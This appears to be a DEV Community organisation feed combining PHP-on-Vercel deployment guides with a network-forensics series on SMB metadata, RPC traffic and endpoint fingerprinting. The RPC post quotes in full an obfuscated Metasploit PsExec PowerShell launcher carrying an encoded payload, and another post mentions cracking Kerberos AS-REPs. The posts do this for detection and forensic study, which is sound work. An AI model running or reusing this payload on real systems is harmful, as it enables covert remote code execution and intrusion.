DEV Community: NetrixOne

Vercel PHP: PHP 8.4 & PHP 8.5

Milan Felix Šulc — Wed, 21 Jan 2026 09:21:25 +0000

Back in the ZEIT Now days, I wrote a couple of posts about running PHP on “a frontend platform” and shipping tiny serverless endpoints next to static sites:

Fast-forward: ZEIT is now Vercel, and the community PHP runtime has matured into a pretty practical way to run PHP on Vercel Functions.

And there’s fresh news: v0.8.0 adds PHP 8.4, and v0.9.0 adds PHP 8.5 🎉

Runtime repo: https://github.com/vercel-community/php/
Announcement thread: https://community.vercel.com/t/vercel-php/31428

What shipped

vercel-php@0.8.0 → PHP 8.4.x
vercel-php@0.9.0 → PHP 8.5.x

Why you might care about PHP 8.4 / 8.5

PHP 8.4 is a major language update with features like property hooks, asymmetric visibility, DOM updates, and general performance/cleanup.

Release notes: https://www.php.net/releases/8.4/en.php

PHP 8.5 (released Nov 20, 2025) adds goodies like a built-in URI extension and the pipe operator (|>), plus other improvements.

Release notes: https://www.php.net/releases/8.5/en.php

If you’re deploying micro-APIs, webhooks, “backend-for-frontend” endpoints, or lightweight PHP apps on Vercel, being able to pin a modern runtime version is a big deal.

The runtime in one sentence

vercel-php is a community runtime that runs your PHP code inside Vercel Functions, with Composer support and a bunch of bundled extensions.

Repo: https://github.com/vercel-community/php/

Quickstart: “Hello PHP” on Vercel (PHP 8.5)

Minimal structure:

project/
├─ api/
│  └─ index.php
└─ vercel.json

api/index.php

<?php

header('content-type: application/json');

echo json_encode([
  'ok'  => true,
  'php' => PHP_VERSION,
  'sapi'=> php_sapi_name(),
]);

vercel.json (pin PHP 8.5)

{
  "functions": {
    "api/*.php": { "runtime": "vercel-php@0.9.0" }
  }
}

Deploy with the Vercel CLI or the Dashboard. Done.

If you want a canonical “works out of the box” demo, there’s also a tiny landing/demo here:

https://php.vercel.app/

Want PHP 8.4 instead?

Same setup—just change the runtime version:

{
  "functions": {
    "api/*.php": { "runtime": "vercel-php@0.8.0" }
  }
}

“Route everything to index.php” (classic app style)

If you’re adapting a small framework/router or want a single entrypoint:

{
  "functions": {
    "api/index.php": { "runtime": "vercel-php@0.9.0" }
  },
  "routes": [{ "src": "/(.*)", "dest": "/api/index.php" }]
}

Composer support (yes)

If you have dependencies:

project/
├─ api/
│  └─ index.php
├─ composer.json
└─ vercel.json

Practical tip: add a .vercelignore and ignore /vendor so you don’t upload it—let the build install deps instead.

Tuning Function limits (duration + memory)

You can configure per-function limits in vercel.json:

{
  "functions": {
    "api/*.php": {
      "runtime": "vercel-php@0.9.0",
      "memory": 1024,
      "maxDuration": 60
    }
  }
}

Note: Duration limits depend on your Vercel plan and whether features like Fluid Compute are enabled.

Docs: https://vercel.com/docs/functions/configuring-functions/duration

Overriding php.ini

Need custom INI settings? Drop a php.ini next to your handlers:

api/
├─ index.php
└─ php.ini

Example:

memory_limit=1024M
disable_functions="exec,system"

A couple of gotchas

Local dev: the runtime ecosystem historically hasn’t been perfect with vercel dev in every setup. If you hit issues, the simplest fallback is using PHP’s built-in server locally and treating Vercel as your deploy target.
Config file choice: Vercel supports vercel.json or vercel.ts (programmatic), but you typically use one configuration approach per project. Docs: https://vercel.com/docs/projects/project-configuration

Upgrading from older pins

If you’re already using vercel-php, upgrading is often just changing the runtime string:

vercel-php@0.7.x → vercel-php@0.8.0 (PHP 8.4)
vercel-php@0.8.x → vercel-php@0.9.0 (PHP 8.5)

Then:

make sure your composer.json PHP constraint matches (e.g. ^8.4 / ^8.5)
run tests
deploy to a Preview URL and hit the endpoints

SMB: endpoint fingerprinting

Petr Stuchlík — Mon, 02 Mar 2020 08:46:38 +0000

Welcome to another article on network forensics. We are still talking about the SMB protocol family, but this time let's focus on messages that carry hints about the connected endpoints. These hints can be used to infer knowledge about the client and server (e.g. OS version). This process is called fingerprinting.

Protocol negotiation

SMB1 NegotiateProtocolRequest (smb.cmd == 0x72) carries information about the dialects that the client understands. Similarly SMB2 NEGOTIATE request (smb2.cmd == 0) contains a list of client's dialects and SMB 3.x capabilities. These bits are specific to client implementation (or configuration) and thus can be used as part of the client's fingerprint.

The same applies for the response as well. Fields like server capabilities
(smb.server_cap), system time (smb.system.time), time zone (smb.server_timezone), boot time (smb2.boot_time) or authentication mechanisms (spnego.mechTypes) can tell a lot about the server endpoint.

Wireshark filter: smb.cmd == 0x72 or smb2.cmd == 0
PCAP sample: smb-on-windows-10.pcapng on Wireshark wiki

NTLM authentication

NTLM authentication has been long superseded by a more secure Kerberos, but in my experience it can still be found wildly in public institutions and smaller companies and sometimes even in corporate networks. From a forensic POV we are mainly interested in usernames, hostnames and NTLM hashes:

Wireshark filter: ntlmssp (or gss-api for all negotiation packets)
PCAP sample: smb-on-windows-10.pcapng on Wireshark wiki

Kerberos authentication

In case of Kerberos there are still useful metadata like realm aka. domain name (kerberos.crealm), principals aka. user/server names (kerberos.cname/kerberos.pname/kerberos.sname), auth period (kerberos.from/kerberos.til) and more.

Also, Kerberos AS-REPs (kerberos.cipher field) can sometimes be cracked to yield credentials e.g. with John the Ripper.

Wireshark filter: kerberos (or gss-api for all negotiation packets)
PCAP sample: Kerberos-CIFS.Cap at pcapr

SPOOLSS GetPrinterData

OK this is probably a really niché case, but hey, that's what forensics is all about. When using a shared network printer, MS Spool Subsystem (spoolss) is typically used over SMB/RPC stack. Once that printer is available, the OS can request various printer data using GetPrinterData function. Inspecting these data can reveal interesting bits, e.g. OS Version of the print server.

Wirehsark filter: spoolss.printerdata

If you're interested in reading more about OS/application/device fingerprinting, there's sadly not many links I could point you to. Tools like p0f or nmap can provide a good start. You can also read this post by SecurityTrails which summarizes different means of fingerprinting including SSH or TLS protocols.

References

SMB: metadata in RPC

Petr Stuchlík — Wed, 22 Jan 2020 16:58:42 +0000

They call it DCE/RPC, but at the end of the day it's just a huge pile of cleartext metadata on your network.

This is another article in the series on metadata for network forensics. In the previous article I gave some examples of metadata hiding in common SMB file transfers and today I am going to briefly describe Remote Procedure Calls over SMB.

While Samba is mostly known as a file and printer sharing solution, it also provides Named Pipes to facilitate communication between local and remote process.

Now, in Windows networks, Named Pipes are typically used by MSRPC protocol. MSRPC is basicly an implementation of Distributed Computing Environment Remote Procedure Call (DCE/RPC) protocol used to execute functions on the remote endpoint and to transfer data. This allows MSRPC to copy files, work with remote Windows registry and manage Windows services while having the benefit of SMB authentication layer (since a named pipe is just another type of a "share"). Following services are typical examples of MSRPC traffic generators:

MS Sharing
MS Security (NLMSSP)
MS Active Directory
MS Print
MS Terminal Server
MS Remote Services

So e.g. Spoolsvc.exe can generate a packet which looks like this:

+-------------------------------+
|              IP               |
+-------------------------------+
|             TCP               |
+-------------------------------+
|        SMB Named Pipe         |
+-------------------------------+
|        MSRPC (DCE/RPC)        |
+-------------------------------+
|     Print Spooler Service     |
+-------------------------------+

401TRG compiled an excellent resource on this topic and packet samples in the following sections are borrowed from their work.

Domain users enumeration

Security Account Manager (SAMR) protocol uses SMB as one of its transport protocols. In this case, SMB connects to samr pipe on IPC$ share. It can then invoke SAMR methods to enumerate domains (samr.opnum == 6), domain users (samr.opnum == 13), query user info (samr.opnum == 36) etc. Following filter shows packets with user information.

Wireshark filter: samr.samr_EnumDomainUsers.sam or samr.samr_QueryUserInfo.info
PCAP sample: smb_net_user.pcap by 401TRG

PsExec

PsExec is a popular Sysinternals Suite tool for remote administration in Active Directory environments and is often an attacker's favorite choice for remote code execution attacks. A deep dive to PsExec is can by found in this blog.

In a basic attack scenario a binary PSEXESVC.exe is transferred over SMB
protocol to a victim machine using ADMIN$ share. It is then executed remotely as a temporary service using IPC$ share. Following filter will match SMB transfers and invocations of PsExec based on filename detection.

Wireshark filter: smb.file ~ "PSEXESVC" or smb2.filename ~ "PSEXESVC" or svcctl.servicename ~ "PSEXESVC"
PCAP sample: smb_psexec_add_user.pcap by 401TRG

It is however worth noting that such a file transfer usually triggers alarms so PsExec modules like Metasploit attempt to evade it using PowerShell invocation via RPC. An example how Metasploit obfuscates its payload:

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIfj8FkCA71WbW/aSBD+nEr9D1aFZFsl2BDaNJEqnW0gEDABHCDAoWhjr+2FtZfY6/DS63+/MdgNVZoq1w9ngbwvM7vPPvPMjt0ktDlhoeB0y8OF3
/YuhG/v3530UIQCQSr4y6ZxnxSFwkOX+BEn8skJzBaCbmt037OGdC18FaSZtlrVWIBIOL+8NJIowiE/9EtXmGtxjIMHSnAsycI
/wtjHET69eVhgmwvfhMJ96YqyB0Qzs62BbB8Lp1ropHMdZqMUXslaUcIl8e+/RXl2Wp6X6o8JorEkWtuY46DkUCrKwnc53fB2u8KSaBI7YjFzeWlMwrNKaRjGyMVdWO0Jm5j7zIlFGc4CvwjzJAqFo1OlyxyMJBGavYjZmuNEOAafUit8YkssFcKE0qLwlzTLMAySkJMAwzzHEVtZOHoiNo5LTRQ6FA+wO5e6eJ0f
/a1O0rETWPV4JBchMq+CNZmTUHzwF+WXcLOYyvAcxRWo+P7+3ft3bq6HhVpF1xN3MDg7FgS0Tmb7Nga8Uo/FZG/9VVCLggl7Is6iLXQLt1GC5bkwS6Mxm8+FAh2onduhXnx9iXJuD9Ye2d7A0GzEiDMHlyxUhU05Cax04nXN1bBLQlzbhiggdi4r6VfcY5fi/WlLuVkXUEliNoGdGqbYQzzlsSjMXrrVA8J
/+OoJoQ6ONBviFwMqCK38M5hDaCSxFZo4AJ4OfRHC4IKYcW6dCXib7572wUg0KIrjotBLIJvsomBhRLFTFLQwJtmUlnC2b4rPcM2EcmKjmOfLzeUfRGYbGiyMeZTYEDs4/K21wjZBNOWiKDSJg
/WtRbx8Y
/GXTBiIUhJ6sNITRAJGUgYsnioiAox59OWShXkrWFEcgNk+tRsUeZDIWSLsVYQ87IgvUOYaPwg6JSRn4ggjRNmijBeFEYk4XBEpuamW/hjC0f1wAGNEOIuJlCfNTN
/yVOSFDZk+erpubrxUohlLe04iDnw0IhboKMafqxaPgC3pg3JDDA2eSSukpq0vSVlbk3LLhP+QnLVY7dxpXy+aSlTb+K7Wiltms1frN5vVp2trVOVWvcXbvRY363eLhaU1B8MJn7a05i1Rl5PqbnVNdlZHcyYb5fNO361VfbNbeI47qbmud+5ag/KnBumMjb6uVlCnVk86Y32tq9W4TtbNPhn2l9cN
/jAZUTR0Fe+ufIHIphMtRmVm7lqaduWf2btrd3Tlm8520lQuxtWlVtc0I6yPGjprT
/RI6ykj5K3Yuu21zcAzNL1hEzztDxt6v9
/QteHV4rF2oXjge4d8fTyqkOnqbuBDvwEQ2opabTl4xyZ9IOmKacgbgI1nVGzfBZvaR03
/2GVxBS11pulg05g+Aq7JqtGjMH87rDBtRLt3SOtMtw1FKU96Va2pkvGVp6VLIk
/vIy1+qu1qSnnkMGf8qTtxldEdPVdqxu3KdhVFWTdrbXta3ny5Oa
/q6qMRkIA+VBzlYvhFD+FkvSfP6Y
/PB5vu9gH2GyrK6EMqHdBOwTfak+sjMbx235soin1EQSRwheeZ2mBRI7uPe4ykHpL0XKeXOAoxhdIGxS+Xu0Yps9P6cHR9Q4U61I05ZO4QmmeVX7Zk4Yeh
/Fw38qHLyykAhjR61nipg0OP+0V1c6aqcP+rm6oK5377UQ222kpHCxbTKnKg7OeN6H4jOc21gpPsIkzuw/+B1CzVfXg5byP1eew3s28iWi1mRLwY
/3ngPxH+ZzSMEeFgbsGNRfGhhP6OjUxNR58eechAKW72pJ+CNwk/7cJXyb
/ONMdWhAoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Wireshark alone won't get you very far here, but sometimes you should be able to spot PowerShell in SMB packets and work from there:

Wireshark filter: smb.file ~ "POWERSHELL" or smb2.filename ~ "POWERSHELL" or svcctl.binarypathname ~ "POWERSHELL"
PCAP sample: smb_metasploit_psexec_pth_download_meterpreter.pcap by 401TRG

As you can see, RPC can be used to call remote functions, which can also mean starting a remote service, which in turn can do almost anything you want. Next time I am going to dig some bits in the SMB traffic which can provide useful in endpoint fingerprinting.

References

SMB: file metadata and metadata files

Petr Stuchlík — Wed, 08 Jan 2020 08:29:55 +0000

After spending some years in network forensics field, hoarding tons of PCAPs and making cryptic notes on the topic I decided that I wanted to review it all and start sharing some concepts, interesting findings or cool ideas. I hope that someone might find them useful or just fun to follow. For the sake of sanity I am going to publish this as series.

This article will be dealing with SMB protocol and metadata hiding in it, often in plain sight. My knowledge on SMB is certainly limited and I still remember the time when "Samba" was just an easy way to share stuff on MS Windows network. In my experience this is also what many people think today, sometimes even in forensic world. The usual evidence is that files were transferred from A to B and metadata are often ignored because of the juicy payloads.

But SMB is pretty damn complex ecosystem and has much more to offer. So in this article I am going to ignore the typical file transfers.

Tools exist.

Let's focus on metadata.

Intro

In this part I will describe some sources of metadata which either accompany common SMB file transfers or get transferred as files due to OS or app-specific behavior.

For brevity of this text I am going to expect that the reader is familiar with Wireshark and basics of SMB protocol. While a lot of information about SMB protocol can be found on Wireshark wiki, I highly recommend SMB Quick Introduction by Hats Off Security as the author can really look on things from forensic POV.

The important thing for our purpose is that SMB protocol has three major versions (SMB 1-3), but version 3 is technically just SMB 2.2 so the first Wireshark filter you should be aware of is smb or smb2 which gives you all SMB packets regardless of the version.

MACB timestamps

File MACB (modification, access, change, birth) timestamps are one the basic forensic artifacts as they help to point a forensic timeline for a given case. Luckily Samba supports these timestamps in many common packets like SMB2/Create Response (downloads typically), SMB2/GetInfo Response, SMB2/SetInfo Request and SMB2/Close Response.

Note that these fields have type Date and time, so to list files created since 2020 you would use smb2.create.time > "Jan 01, 2020 00:00:00" instead of the raw value.

Wireshark filter: smb.access.time or smb2.last_access.time
PCAP sample: smb2_putty_xfer.pcap by Chris Sanders

Thumbs.db

Speaking of file metadata there can also be complimentary metadata files. These files are not always available, because their presence in the traffic is conditioned by a specific OS or application feature.

On MS systems one of the most common metadata files is Windows thumbnail cache, aka Thumbs.db. The file is notoriously known and stores thumbnail images for explorer.exe to load faster. What's not so widely known outside infosec community is that when browsing Samba shares using MS Explorer, this file gets created and transferred automatically over network (the thumbnail cache makes even more sense in this case).

Wireshark filter: smb.file contains "Thumbs.db" or smb2.filename contains "Thumbs.db"
Tool: Thumbs viewer

Outlook.NK2

Another interesting metadata file is Outlook.NK2. This is a MS Office AutoComplete list of names and email addresses. Outlook automatically updates this file according to user activity. If you happen to gaze into network where MS Office applications run over network, there's a chance that you can encounter a transfer of this file in the traffic.

Wireshark filter: smb.file contains ".NK2" or smb2.filename contains ".NK2"
Tool: NK2Edit

NTUser.dat

You can find SMB file transfers of ntuser.dat when Microsoft Roaming User Profiles are deployed. Citing MS docs:

Roaming User Profiles redirects user profiles to a file share so that users receive the same operating system and application settings on multiple computers.

This means that all user profile data are transferred over network including MS Registry Hives such as ntuser.dat. This file contains anything that typically resides in HKEY_CURRENT_USER, e.g. mount points, recent documents, typed URLs, connected wireless APs or remotely connected systems.

Wireshark filter: smb.file contains "ntuser.dat" or smb2.filename contains "ntuser.dat"
Tool: RegRipper, Regipy

.DS_STORE

On MacOS a .DS_STORE file is a hidden attribute store which can be automatically created by MacOS Finder in any folder (regardless of file system or network share) based on user activity.

The file has recently gained some attention in infosec community, because it can contain sensitive information. With the fact that it is hidden by default in the Finder, it can easily lead to data leaks. What sensitive information you ask? For example:

all file and directory names in the corresponding folder
selected items in the folder
trash put backs

Especially the first case is interesting if you find a .DS_STORE on a website. I recommend a SANS talk by Nicole Ibrahim and a dissection guide by gehaxelt for more information on the topic.

Wireshark filter: smb.file contains ".DS_STORE" or smb2.filename contains ".DS_STORE"
Tool: ds_store.go, ds_store_parser.py

That's it for today. Do you know of any other forensic metadata sources in SMB protocol? Let me know.

References

Deploy Static Frontend + PHP Files Using ZEIT Now

Milan Felix Šulc — Mon, 16 Dec 2019 09:10:12 +0000

I am quite a fan of ZEIT company and even more of their tool called Now.

I consider myself mainly as PHP developer, but I also like JavaScript. In these days static site generators are raising and I am totally into it.

So how to take advantage of static frontend but with dynamic backend written in PHP?

Since November 2019 it's simple as possible with ZEIT Now.

Milan Felix Šulc

@xf3l1x

@rauchg @drk @rjs @ionos_com @zeithq Hi @rjs.

Deploy static frontend with PHP files to @zeithq is pretty easy. We're using it daily.

I've prepared for you a demo. 🎄

You can reach me anytime. 👨🏻‍💻

bit.ly/2RF8cbh

12:17 PM - 10 Dec 2019

0 1

👀 https://imgur.com/V7CcInl

Minimal project structure looks like this, you gonna need only 3 files.

project/
├── api/
│   ├── index.php
├── now.json
└── index.html

File index.html contains static frontend.

<html>
<head></head>
<body>

#
# Fetch data from /api/index.php using Fetch API
#

</body>
</html>

File api/index.php contains dynamic data or expose API endpoint.

<?php

header('conten-type: application/json');
echo json_encode(['tech' => 'ZEIT Now']);

File now.json setup deployment.

{
  "functions": {
    "api/index.php": {
      "runtime": "now-php@0.0.7"
    }
  }
}

Finally you can call now command and see what happened.

View this example on Github.

Bleeding Edge PHP on ZEIT Now

Milan Felix Šulc — Sun, 07 Jul 2019 16:11:03 +0000

Today I would like to show you ZEIT Now platform. Well, you've probably heard about it. There are many blogposts about this awesome piece of technology (https://dev.to/search?q=zeit%20now).

But, I have some good news for PHP devs. Since June (06/2019) I am working on the enhanced PHP builders for ZEIT Now.

These builders support:

multiple PHP versions (7.2.20, 7.3.7, 7.4.0alpha2) 🚀
- official PHP builder is 7.1.22
multiple running modes (server, cgi, cli, fpm) 🧙‍♂️
- just pick whatever you like
many preinstalled PHP extensions 📦
install dependencies via Composer 🤩

The updated builders you can find at the Github juicyfx/now-php and I would appreciate any feedback.

How to test it? Take a look at examples

How to deploy under 1 minute? Create index.php and now.json in your project's folder. If you're not familiar with ZEIT Now, take a look at official website.

<?php 

phpinfo();

{
    "version": 2,
    "builds": [
      { "src": "old.php", "use": "@now/php" },
      { "src": "new.php", "use": "now-php" }
    ]
}

Yep, that's all. And now call now. 🤓

You should saw something like that.

At the end, some examples.

official - https://php.now.sh/
phpinfo - https://php.jfx.cz/
extensions - https://php.jfx.cz/ext/
ini - https://php.jfx.cz/ini/
JSON API - https://php.jfx.cz/api/users.php
test - https://php.jfx.cz/test.php

I'm also testing Caddy server with FPM and Bref.sh. There are many features you might be looking for.

PHP builder was separated from zeit/now-builders to solo repository - https://github.com/juicyfx/now-php. Take a look.

Happy testing,
Felix

DEV Community: NetrixOne

Vercel PHP: PHP 8.4 & PHP 8.5

What shipped

Why you might care about PHP 8.4 / 8.5

The runtime in one sentence

Quickstart: “Hello PHP” on Vercel (PHP 8.5)

Want PHP 8.4 instead?

“Route everything to index.php” (classic app style)

Composer support (yes)

Tuning Function limits (duration + memory)

Overriding php.ini

A couple of gotchas

Upgrading from older pins

Links

SMB: endpoint fingerprinting

Protocol negotiation

NTLM authentication

Kerberos authentication

SPOOLSS GetPrinterData

References

SMB: metadata in RPC

Domain users enumeration

PsExec

References

SMB: file metadata and metadata files

Intro

MACB timestamps

Thumbs.db

Outlook.NK2

NTUser.dat

.DS_STORE

References

Deploy Static Frontend + PHP Files Using ZEIT Now

Bleeding Edge PHP on ZEIT Now